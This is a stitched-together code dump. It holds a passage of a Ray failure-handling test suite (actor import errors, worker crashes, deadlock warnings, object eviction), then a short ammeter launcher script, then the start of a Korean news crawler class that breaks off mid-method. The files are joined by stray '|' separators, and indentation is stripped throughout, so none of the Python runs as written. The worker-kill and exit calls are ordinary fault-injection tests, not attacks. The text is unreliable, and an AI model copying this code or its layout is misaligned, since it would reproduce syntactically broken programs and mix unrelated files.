errors = get_error_message(p, 2, ray_constants.FUNCTION_TO_RUN_PUSH_ERROR)
assert len(errors) == 2
assert errors[0].type == ray_constants.FUNCTION_TO_RUN_PUSH_ERROR
assert "Function to run failed." in errors[0].error_message
assert "Function to run failed." in errors[1].error_message
def test_fail_importing_actor(ray_start_regular, error_pubsub):
p = error_pubsub
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define an actor that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
class Foo:
def __init__(self, arg1, arg2=3):
self.x = module.temporary_python_file()
def get_val(self, arg1, arg2=3):
return 1
# There should be no errors yet.
errors = get_error_message(p, 2)
assert len(errors) == 0
# Create an actor.
foo = Foo.remote(3, arg2=0)
errors = get_error_message(p, 2)
assert len(errors) == 2
for error in errors:
# Wait for the error to arrive.
if error.type == ray_constants.REGISTER_ACTOR_PUSH_ERROR:
assert "No module named" in error.error_message
else:
# Wait for the error from when the __init__ tries to run.
assert ("failed to be imported, and so cannot execute this method"
in error.error_message)
# Check that if we try to get the function it throws an exception and
# does not hang.
with pytest.raises(Exception, match="failed to be imported"):
ray.get(foo.get_val.remote(1, arg2=2))
# Wait for the error from when the call to get_val.
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert ("failed to be imported, and so cannot execute this method" in
errors[0].error_message)
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_actor_init(ray_start_regular, error_pubsub):
p = error_pubsub
error_message1 = "actor constructor failed"
error_message2 = "actor method failed"
@ray.remote
class FailedActor:
def __init__(self):
raise Exception(error_message1)
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed constructor.
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert error_message1 in errors[0].error_message
# Make sure that we get errors from a failed method.
a.fail_method.remote()
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert error_message1 in errors[0].error_message
def test_failed_actor_method(ray_start_regular, error_pubsub):
p = error_pubsub
error_message2 = "actor method failed"
@ray.remote
class FailedActor:
def __init__(self):
pass
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed method.
a.fail_method.remote()
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert error_message2 in errors[0].error_message
def test_incorrect_method_calls(ray_start_regular):
@ray.remote
class Actor:
def __init__(self, missing_variable_name):
pass
def get_val(self, x):
pass
# Make sure that we get errors if we call the constructor incorrectly.
# Create an actor with too few arguments.
with pytest.raises(Exception):
a = Actor.remote()
# Create an actor with too many arguments.
with pytest.raises(Exception):
a = Actor.remote(1, 2)
# Create an actor the correct number of arguments.
a = Actor.remote(1)
# Call a method with too few arguments.
with pytest.raises(Exception):
a.get_val.remote()
# Call a method with too many arguments.
with pytest.raises(Exception):
a.get_val.remote(1, 2)
# Call a method that doesn't exist.
with pytest.raises(AttributeError):
a.nonexistent_method()
with pytest.raises(AttributeError):
a.nonexistent_method.remote()
def test_worker_raising_exception(ray_start_regular, error_pubsub):
p = error_pubsub
@ray.remote(max_calls=2)
def f():
# This is the only reasonable variable we can set here that makes the
# execute_task function fail after the task got executed.
worker = ray.worker.global_worker
worker.function_actor_manager.increase_task_counter = None
# Running this task should cause the worker to raise an exception after
# the task has successfully completed.
f.remote()
errors = get_error_message(p, 1, ray_constants.WORKER_CRASH_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_CRASH_PUSH_ERROR
def test_worker_dying(ray_start_regular, error_pubsub):
p = error_pubsub
# Define a remote function that will kill the worker that runs it.
@ray.remote(max_retries=0)
def f():
eval("exit()")
with pytest.raises(ray.exceptions.WorkerCrashedError):
ray.get(f.remote())
errors = get_error_message(p, 1, ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_DIED_PUSH_ERROR
assert "died or was killed while executing" in errors[0].error_message
def test_actor_worker_dying(ray_start_regular, error_pubsub):
p = error_pubsub
@ray.remote
class Actor:
def kill(self):
eval("exit()")
@ray.remote
def consume(x):
pass
a = Actor.remote()
[obj], _ = ray.wait([a.kill.remote()], timeout=5)
with pytest.raises(ray.exceptions.RayActorError):
ray.get(obj)
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(consume.remote(obj))
errors = get_error_message(p, 1, ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_DIED_PUSH_ERROR
def test_actor_worker_dying_future_tasks(ray_start_regular, error_pubsub):
p = error_pubsub
@ray.remote(max_restarts=0)
class Actor:
def getpid(self):
return os.getpid()
def sleep(self):
time.sleep(1)
a = Actor.remote()
pid = ray.get(a.getpid.remote())
tasks1 = [a.sleep.remote() for _ in range(10)]
os.kill(pid, 9)
time.sleep(0.1)
tasks2 = [a.sleep.remote() for _ in range(10)]
for obj in tasks1 + tasks2:
with pytest.raises(Exception):
ray.get(obj)
errors = get_error_message(p, 1, ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_DIED_PUSH_ERROR
def test_actor_worker_dying_nothing_in_progress(ray_start_regular):
@ray.remote(max_restarts=0)
class Actor:
def getpid(self):
return os.getpid()
a = Actor.remote()
pid = ray.get(a.getpid.remote())
os.kill(pid, 9)
time.sleep(0.1)
task2 = a.getpid.remote()
with pytest.raises(Exception):
ray.get(task2)
def test_actor_scope_or_intentionally_killed_message(ray_start_regular,
error_pubsub):
p = error_pubsub
@ray.remote
class Actor:
def __init__(self):
# This log is added to debug a flaky test issue.
print(os.getpid())
def ping(self):
pass
a = Actor.remote()
    # Without this wait, there seems to be a race condition in the CI.
    # This is not a fundamental fix for that, but it at least makes the
    # test less flaky.
ray.get(a.ping.remote())
a = Actor.remote()
a.__ray_terminate__.remote()
time.sleep(1)
errors = get_error_message(p, 1)
    assert len(errors) == 0, "Should not have propagated an error - {}".format(
        errors)
def test_exception_chain(ray_start_regular):
@ray.remote
def bar():
return 1 / 0
@ray.remote
def foo():
return ray.get(bar.remote())
r = foo.remote()
try:
ray.get(r)
except ZeroDivisionError as ex:
assert isinstance(ex, RayTaskError)
@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
"ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error1(ray_start_object_store_memory, error_pubsub):
p = error_pubsub
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_arg_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = single_dependency.remote(0, np.zeros(
object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
        # are still running, the ray.get below should hang and push an error to
# the driver.
ray.get(args[0])
put_arg_task.remote()
# Make sure we receive the correct error message.
errors = get_error_message(p, 1,
ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR
@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
"ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error2(ray_start_object_store_memory):
# This is the same as the previous test, but it calls ray.put directly.
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = ray.put(np.zeros(object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
        # are still running, the ray.get below should hang and push an error to
# the driver.
ray.get(args[0])
put_task.remote()
# Make sure we receive the correct error message.
# get_error_message(ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR, 1)
@pytest.mark.skip("Publish happeds before we subscribe it")
def test_version_mismatch(error_pubsub, shutdown_only):
ray_version = ray.__version__
ray.__version__ = "fake ray version"
ray.init(num_cpus=1)
p = error_pubsub
errors = get_error_message(p, 1, ray_constants.VERSION_MISMATCH_PUSH_ERROR)
assert False, errors
assert len(errors) == 1
assert errors[0].type == ray_constants.VERSION_MISMATCH_PUSH_ERROR
# Reset the version.
ray.__version__ = ray_version
def test_export_large_objects(ray_start_regular, error_pubsub):
p = error_pubsub
import ray.ray_constants as ray_constants
large_object = np.zeros(2 * ray_constants.PICKLE_OBJECT_WARNING_SIZE)
@ray.remote
def f():
large_object
# Invoke the function so that the definition is exported.
f.remote()
# Make sure that a warning is generated.
errors = get_error_message(p, 1,
ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR
@ray.remote
class Foo:
def __init__(self):
large_object
Foo.remote()
# Make sure that a warning is generated.
errors = get_error_message(p, 1,
ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR
def test_warning_all_tasks_blocked(shutdown_only):
ray.init(
num_cpus=1, _system_config={"debug_dump_period_milliseconds": 500})
p = init_error_pubsub()
@ray.remote(num_cpus=1)
class Foo:
def f(self):
return 0
@ray.remote
def f():
        # Creating all three actors is not possible with only one CPU.
actors = [Foo.remote() for _ in range(3)]
for a in actors:
ray.get(a.f.remote())
# Run in a task to check we handle the blocked task case correctly
f.remote()
errors = get_error_message(p, 1, ray_constants.RESOURCE_DEADLOCK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.RESOURCE_DEADLOCK_ERROR
def test_warning_actor_waiting_on_actor(shutdown_only):
ray.init(
num_cpus=1, _system_config={"debug_dump_period_milliseconds": 500})
p = init_error_pubsub()
@ray.remote(num_cpus=1)
class Actor:
pass
a = Actor.remote() # noqa
b = Actor.remote() # noqa
errors = get_error_message(p, 1, ray_constants.RESOURCE_DEADLOCK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.RESOURCE_DEADLOCK_ERROR
def test_warning_task_waiting_on_actor(shutdown_only):
ray.init(
num_cpus=1, _system_config={"debug_dump_period_milliseconds": 500})
p = init_error_pubsub()
@ray.remote(num_cpus=1)
class Actor:
pass
a = Actor.remote() # noqa
@ray.remote(num_cpus=1)
def f():
print("f running")
time.sleep(999)
ids = [f.remote()] # noqa
errors = get_error_message(p, 1, ray_constants.RESOURCE_DEADLOCK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.RESOURCE_DEADLOCK_ERROR
def test_warning_for_infeasible_tasks(ray_start_regular, error_pubsub):
p = error_pubsub
# Check that we get warning messages for infeasible tasks.
@ray.remote(num_gpus=1)
def f():
pass
@ray.remote(resources={"Custom": 1})
class Foo:
pass
# This task is infeasible.
f.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
# This actor placement task is infeasible.
Foo.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
def test_warning_for_infeasible_zero_cpu_actor(shutdown_only):
# Check that we cannot place an actor on a 0 CPU machine and that we get an
# infeasibility warning (even though the actor creation task itself
# requires no CPUs).
ray.init(num_cpus=0)
p = init_error_pubsub()
@ray.remote
class Foo:
pass
# The actor creation should be infeasible.
Foo.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
p.close()
def test_warning_for_too_many_actors(shutdown_only):
    # Check that we receive a warning if we run a workload that requires
    # too many workers to be started.
num_cpus = 2
ray.init(num_cpus=num_cpus)
p = init_error_pubsub()
@ray.remote
class Foo:
def __init__(self):
time.sleep(1000)
[Foo.remote() for _ in range(num_cpus * 3)]
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
[Foo.remote() for _ in range(num_cpus)]
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
p.close()
def test_warning_for_too_many_nested_tasks(shutdown_only):
    # Check that we receive a warning if we run a workload that requires
    # too many workers to be started.
num_cpus = 2
ray.init(num_cpus=num_cpus)
p = init_error_pubsub()
remote_wait = Semaphore.remote(value=0)
nested_wait = Semaphore.remote(value=0)
ray.get([
remote_wait.locked.remote(),
nested_wait.locked.remote(),
])
@ray.remote
def f():
time.sleep(1000)
return 1
@ray.remote
def h(nested_waits):
nested_wait.release.remote()
ray.get(nested_waits)
ray.get(f.remote())
@ray.remote
def g(remote_waits, nested_waits):
        # Block on the semaphores so that the f tasks all get submitted to
        # the scheduler after the g tasks.
remote_wait.release.remote()
# wait until every lock is released.
ray.get(remote_waits)
ray.get(h.remote(nested_waits))
num_root_tasks = num_cpus * 4
# Lock remote task until everything is scheduled.
remote_waits = []
nested_waits = []
for _ in range(num_root_tasks):
remote_waits.append(remote_wait.acquire.remote())
nested_waits.append(nested_wait.acquire.remote())
[g.remote(remote_waits, nested_waits) for _ in range(num_root_tasks)]
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
p.close()
def test_warning_for_many_duplicate_remote_functions_and_actors(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def create_remote_function():
@ray.remote
def g():
return 1
return ray.get(g.remote())
for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
ray.get(create_remote_function.remote())
import io
log_capture_string = io.StringIO()
ch = logging.StreamHandler(log_capture_string)
# TODO(rkn): It's terrible to have to rely on this implementation detail,
# the fact that the warning comes from ray.import_thread.logger. However,
# I didn't find a good way to capture the output for all loggers
# simultaneously.
ray.import_thread.logger.addHandler(ch)
ray.get(create_remote_function.remote())
start_time = time.time()
while time.time() < start_time + 10:
log_contents = log_capture_string.getvalue()
if len(log_contents) > 0:
break
ray.import_thread.logger.removeHandler(ch)
assert "remote function" in log_contents
assert "has been exported {} times.".format(
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
# Now test the same thing but for actors.
@ray.remote
def create_actor_class():
# Require a GPU so that the actor is never actually created and we
# don't spawn an unreasonable number of processes.
@ray.remote(num_gpus=1)
class Foo:
pass
Foo.remote()
for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
ray.get(create_actor_class.remote())
log_capture_string = io.StringIO()
ch = logging.StreamHandler(log_capture_string)
# TODO(rkn): As mentioned above, it's terrible to have to rely on this
# implementation detail.
ray.import_thread.logger.addHandler(ch)
ray.get(create_actor_class.remote())
start_time = time.time()
while time.time() < start_time + 10:
log_contents = log_capture_string.getvalue()
if len(log_contents) > 0:
break
ray.import_thread.logger.removeHandler(ch)
assert "actor" in log_contents
assert "has been exported {} times.".format(
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
def test_redis_module_failure(ray_start_regular):
address_info = ray_start_regular
address = address_info["redis_address"]
address = address.split(":")
assert len(address) == 2
def run_failure_test(expecting_message, *command):
with pytest.raises(
Exception, match=".*{}.*".format(expecting_message)):
client = redis.StrictRedis(
host=address[0],
port=int(address[1]),
password=ray_constants.REDIS_DEFAULT_PASSWORD)
client.execute_command(*command)
def run_one_command(*command):
client = redis.StrictRedis(
host=address[0],
port=int(address[1]),
password=ray_constants.REDIS_DEFAULT_PASSWORD)
client.execute_command(*command)
run_failure_test("wrong number of arguments", "RAY.TABLE_ADD", 13)
run_failure_test("Prefix must be in the TablePrefix range",
"RAY.TABLE_ADD", 100000, 1, 1, 1)
run_failure_test("Prefix must be in the TablePrefix range",
"RAY.TABLE_REQUEST_NOTIFICATIONS", 100000, 1, 1, 1)
run_failure_test("Prefix must be a valid TablePrefix integer",
"RAY.TABLE_ADD", b"a", 1, 1, 1)
run_failure_test("Pubsub channel must be in the TablePubsub range",
"RAY.TABLE_ADD", 1, 10000, 1, 1)
run_failure_test("Pubsub channel must be a valid integer", "RAY.TABLE_ADD",
1, b"a", 1, 1)
# Change the key from 1 to 2, since the previous command should have
# succeeded at writing the key, but not publishing it.
run_failure_test("Index is less than 0.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
-1)
run_failure_test("Index is not a number.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
b"a")
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
# It's okay to add duplicate entries.
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 0)
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 1)
run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
    # It's okay to add duplicate entries.
run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
    # It's okay to remove duplicate entries.
run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
# Note that this test will take at least 10 seconds because it must wait for
# the monitor to detect enough missed heartbeats.
def test_warning_for_dead_node(ray_start_cluster_2_nodes, error_pubsub):
cluster = ray_start_cluster_2_nodes
cluster.wait_for_nodes()
p = error_pubsub
node_ids = {item["NodeID"] for item in ray.nodes()}
# Try to make sure that the monitor has received at least one heartbeat
# from the node.
time.sleep(0.5)
# Kill both raylets.
cluster.list_all_nodes()[1].kill_raylet()
cluster.list_all_nodes()[0].kill_raylet()
# Check that we get warning messages for both raylets.
errors = get_error_message(p, 2, ray_constants.REMOVED_NODE_ERROR, 40)
# Extract the client IDs from the error messages. This will need to be
# changed if the error message changes.
warning_node_ids = {error.error_message.split(" ")[5] for error in errors}
assert node_ids == warning_node_ids
def test_raylet_crash_when_get(ray_start_regular):
def sleep_to_kill_raylet():
# Don't kill raylet before default workers get connected.
time.sleep(2)
ray.worker._global_node.kill_raylet()
object_ref = ray.put(np.zeros(200 * 1024, dtype=np.uint8))
ray.internal.free(object_ref)
thread = threading.Thread(target=sleep_to_kill_raylet)
thread.start()
with pytest.raises(ray.exceptions.ObjectLostError):
ray.get(object_ref)
thread.join()
def test_connect_with_disconnected_node(shutdown_only):
config = {
"num_heartbeats_timeout": 50,
"raylet_heartbeat_period_milliseconds": 10,
}
cluster = Cluster()
cluster.add_node(num_cpus=0, _system_config=config)
ray.init(address=cluster.address)
p = init_error_pubsub()
errors = get_error_message(p, 1, timeout=5)
assert len(errors) == 0
    # This node is killed by SIGKILL, ray_monitor will mark it as dead.
dead_node = cluster.add_node(num_cpus=0)
cluster.remove_node(dead_node, allow_graceful=False)
errors = get_error_message(p, 1, ray_constants.REMOVED_NODE_ERROR)
assert len(errors) == 1
    # This node is killed by SIGKILL, ray_monitor will mark it as dead.
dead_node = cluster.add_node(num_cpus=0)
cluster.remove_node(dead_node, allow_graceful=False)
errors = get_error_message(p, 1, ray_constants.REMOVED_NODE_ERROR)
assert len(errors) == 1
# This node is killed by SIGTERM, ray_monitor will not mark it again.
removing_node = cluster.add_node(num_cpus=0)
cluster.remove_node(removing_node, allow_graceful=True)
errors = get_error_message(p, 1, timeout=2)
assert len(errors) == 0
# There is no connection error to a dead node.
errors = get_error_message(p, 1, timeout=2)
assert len(errors) == 0
p.close()
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
"num_cpus": 5,
"object_store_memory": 10**8,
}],
indirect=True)
def test_parallel_actor_fill_plasma_retry(ray_start_cluster_head):
@ray.remote
class LargeMemoryActor:
def some_expensive_task(self):
return np.zeros(10**8 // 2, dtype=np.uint8)
actors = [LargeMemoryActor.remote() for _ in range(5)]
for _ in range(10):
pending = [a.some_expensive_task.remote() for a in actors]
while pending:
[done], pending = ray.wait(pending, num_returns=1)
def test_fill_object_store_exception(shutdown_only):
ray.init(
num_cpus=2,
object_store_memory=10**8,
_system_config={"automatic_object_spilling_enabled": False})
@ray.remote
def expensive_task():
return np.zeros((10**8) // 10, dtype=np.uint8)
with pytest.raises(ray.exceptions.RayTaskError) as e:
ray.get([expensive_task.remote() for _ in range(20)])
with pytest.raises(ray.exceptions.ObjectStoreFullError):
raise e.as_instanceof_cause()
@ray.remote
class LargeMemoryActor:
def some_expensive_task(self):
return np.zeros(10**8 + 2, dtype=np.uint8)
def test(self):
return 1
actor = LargeMemoryActor.remote()
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(actor.some_expensive_task.remote())
# Make sure actor does not die
ray.get(actor.test.remote())
with pytest.raises(ray.exceptions.ObjectStoreFullError):
ray.put(np.zeros(10**8 + 2, dtype=np.uint8))
@pytest.mark.parametrize(
"ray_start_cluster", [{
"num_nodes": 1,
"num_cpus": 2,
}, {
"num_nodes": 2,
"num_cpus": 1,
}],
indirect=True)
def test_eviction(ray_start_cluster):
@ray.remote
def large_object():
return np.zeros(10 * 1024 * 1024)
obj = large_object.remote()
assert (isinstance(ray.get(obj), np.ndarray))
# Evict the object.
ray.internal.free([obj])
# ray.get throws an exception.
with pytest.raises(ray.exceptions.ObjectLostError):
ray.get(obj)
@ray.remote
def dependent_task(x):
return
# If the object is passed by reference, the task throws an
# exception.
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(dependent_task.remote(obj))
@pytest.mark.parametrize(
"ray_start_cluster", [{
"num_nodes": 2,
"num_cpus": 1,
}, {
"num_nodes": 1,
"num_cpus": 2,
}],
indirect=True)
def test_serialized_id(ray_start_cluster):
@ray.remote
def small_object():
# Sleep a bit before creating the object to force a timeout
# at the getter.
time.sleep(1)
return 1
@ray.remote
def dependent_task(x):
return x
@ray.remote
def get(obj_refs, test_dependent_task):
print("get", obj_refs)
obj_ref = obj_refs[0]
if test_dependent_task:
assert ray.get(dependent_task.remote(obj_ref)) == 1
else:
assert ray.get(obj_ref) == 1
obj = small_object.remote()
ray.get(get.remote([obj], False))
obj = small_object.remote()
ray.get(get.remote([obj], True))
obj = ray.put(1)
ray.get(get.remote([obj], False))
obj = ray.put(1)
ray.get(get.remote([obj], True))
@pytest.mark.parametrize("use_actors,node_failure",
[(False, False), (False, True), (True, False),
(True, True)])
def test_fate_sharing(ray_start_cluster, use_actors, node_failure):
config = {
"num_heartbeats_timeout": 10,
"raylet_heartbeat_period_milliseconds": 100,
}
cluster = Cluster()
# Head node with no resources.
cluster.add_node(num_cpus=0, _system_config=config)
ray.init(address=cluster.address)
# Node to place the parent actor.
node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
# Node to place the child actor.
cluster.add_node(num_cpus=1, resources={"child": 1})
cluster.wait_for_nodes()
@ray.remote
def sleep():
time.sleep(1000)
@ray.remote(resources={"child": 1})
def probe():
return
# TODO(swang): This test does not pass if max_restarts > 0 for the
# raylet codepath. Add this parameter once the GCS actor service is enabled
# by default.
@ray.remote
class Actor(object):
def __init__(self):
return
def start_child(self, use_actors):
if use_actors:
child = Actor.options(resources={"child": 1}).remote()
ray.get(child.sleep.remote())
else:
ray.get(sleep.options(resources={"child": 1}).remote())
def sleep(self):
time.sleep(1000)
def get_pid(self):
return os.getpid()
# Returns whether the "child" resource is available.
def child_resource_available():
p = probe.remote()
ready, _ = ray.wait([p], timeout=1)
return len(ready) > 0
# Test fate sharing if the parent process dies.
def test_process_failure(use_actors):
a = Actor.options(resources={"parent": 1}).remote()
pid = ray.get(a.get_pid.remote())
a.start_child.remote(use_actors=use_actors)
# Wait for the child to be scheduled.
wait_for_condition(lambda: not child_resource_available())
# Kill the parent process.
os.kill(pid, 9)
wait_for_condition(child_resource_available)
# Test fate sharing if the parent node dies.
def test_node_failure(node_to_kill, use_actors):
a = Actor.options(resources={"parent": 1}).remote()
a.start_child.remote(use_actors=use_actors)
# Wait for the child to be scheduled.
wait_for_condition(lambda: not child_resource_available())
        # Kill the parent node.
cluster.remove_node(node_to_kill, allow_graceful=False)
node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
wait_for_condition(child_resource_available)
return node_to_kill
if node_failure:
test_node_failure(node_to_kill, use_actors)
else:
test_process_failure(use_actors)
ray.state.state._check_connected()
keys = [
key for r in ray.state.state.redis_clients
for key in r.keys("WORKER_FAILURE*")
]
if node_failure:
assert len(keys) <= 1, len(keys)
else:
assert len(keys) <= 2, len(keys)
@pytest.mark.parametrize(
"ray_start_regular", [{
"_system_config": {
"ping_gcs_rpc_server_max_retries": 100
}
}],
indirect=True)
def test_gcs_server_failiure_report(ray_start_regular, log_pubsub):
p = log_pubsub
# Get gcs server pid to send a signal.
all_processes = ray.worker._global_node.all_processes
gcs_server_process = all_processes["gcs_server"][0].process
gcs_server_pid = gcs_server_process.pid
os.kill(gcs_server_pid, signal.SIGBUS)
msg = None
cnt = 0
# wait for max 30 seconds.
while cnt < 3000 and not msg:
msg = p.get_message()
if msg is None:
time.sleep(0.01)
cnt += 1
continue
data = json.loads(ray.utils.decode(msg["data"]))
assert data["pid"] == "gcs_server"
@pytest.mark.parametrize(
"ray_start_regular", [{
"_system_config": {
"task_retry_delay_ms": 500
}
}],
indirect=True)
def test_async_actor_task_retries(ray_start_regular):
# https://github.com/ray-project/ray/issues/11683
signal = SignalActor.remote()
@ray.remote
class DyingActor:
def __init__(self):
print("DyingActor init called")
self.should_exit = False
def set_should_exit(self):
print("DyingActor.set_should_exit called")
self.should_exit = True
async def get(self, x, wait=False):
print(f"DyingActor.get called with x={x}, wait={wait}")
if self.should_exit:
os._exit(0)
if wait:
await signal.wait.remote()
return x
    # Normal, in-order actor task retries should work.
dying = DyingActor.options(
max_restarts=-1,
max_task_retries=-1,
).remote()
assert ray.get(dying.get.remote(1)) == 1
ray.get(dying.set_should_exit.remote())
assert ray.get(dying.get.remote(42)) == 42
# Now let's try out of order retries:
# Task seqno 0 will return
# Task seqno 1 will be pending and retried later
# Task seqno 2 will return
# Task seqno 3 will crash the actor and retried later
dying = DyingActor.options(
max_restarts=-1,
max_task_retries=-1,
).remote()
# seqno 0
ref_0 = dying.get.remote(0)
assert ray.get(ref_0) == 0
# seqno 1
ref_1 = dying.get.remote(1, wait=True)
# seqno 2
ref_2 = dying.set_should_exit.remote()
assert ray.get(ref_2) is None
    # seqno 3, this will crash the actor because the previous task set
    # should_exit to True.
ref_3 = dying.get.remote(3)
# At this point the actor should be restarted. The two pending tasks
# [ref_1, ref_3] should be retried, but not the completed tasks [ref_0,
# ref_2]. Critically, if ref_2 was retried, ref_3 can never return.
ray.get(signal.send.remote())
assert ray.get(ref_1) == 1
assert ray.get(ref_3) == 3
if __name__ == "__main__":
import pytest
sys.exit(pytest.main(["-v", __file__]))
|
run_ammeter.py
|
# listen_join_request, ListenJoinSuccessThreading
from ammeter.main import listen_ammeter_request
from ammeter.main import test_post
import threading
from gevent import monkey
monkey.patch_socket()
import gevent
if __name__ == '__main__':
# gevent.joinall([
# # gevent.spawn(listen_ammeter_request),
# gevent.spawn(test_post),
# ])
threads = []
# threads.append(threading.Thread(target=test_post))
threads.append(threading.Thread(target=listen_ammeter_request))
for t in threads:
t.start()
|
articlecrawler.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from time import sleep
from bs4 import BeautifulSoup
from multiprocessing import Process
from exceptions import *
from articleparser import ArticleParser
from writer import Writer
import os
import platform
import calendar
import requests
import re
class ArticleCrawler(object):
def __init__(self):
self.categories = {'정치': 100, '경제': 101, '사회': 102, '생활문화': 103, '세계': 104, 'IT과학': 105, '오피니언': 110,
'politics': 100, 'economy': 101, 'society': 102, 'living_culture': 103, 'world': 104,
'IT_science': 105, 'opinion': 110}
self.selected_categories = []
self.date = {'start_year': 0, 'start_month': 0, 'end_year': 0, 'end_month': 0}
self.user_operating_system = str(platform.system())
def set_category(self, *args):
for key in args:
if self.categories.get(key) is None:
raise InvalidCategory(key)
self.selected_categories = args
def set_date_range(self, start_year, start_month, end_year, end_month):
args = [start_year, start_month, end_year, end_month]
if start_year > end_year:
raise InvalidYear(start_year, end_year)
if start_month < 1 or start_month > 12:
raise InvalidMonth(start_month)
if end_month < 1 or end_month > 12:
raise InvalidMonth(end_month)
if start_year == end_year and start_month > end_month:
raise OverbalanceMonth(start_month, end_month)
for key, date in zip(self.date, args):
self.date[key] = date
print(self.date)
@staticmethod
def make_news_page_url(category_url, start_year, end_year, start_month, end_month):
print("here is make_news_page_url")
made_urls = []
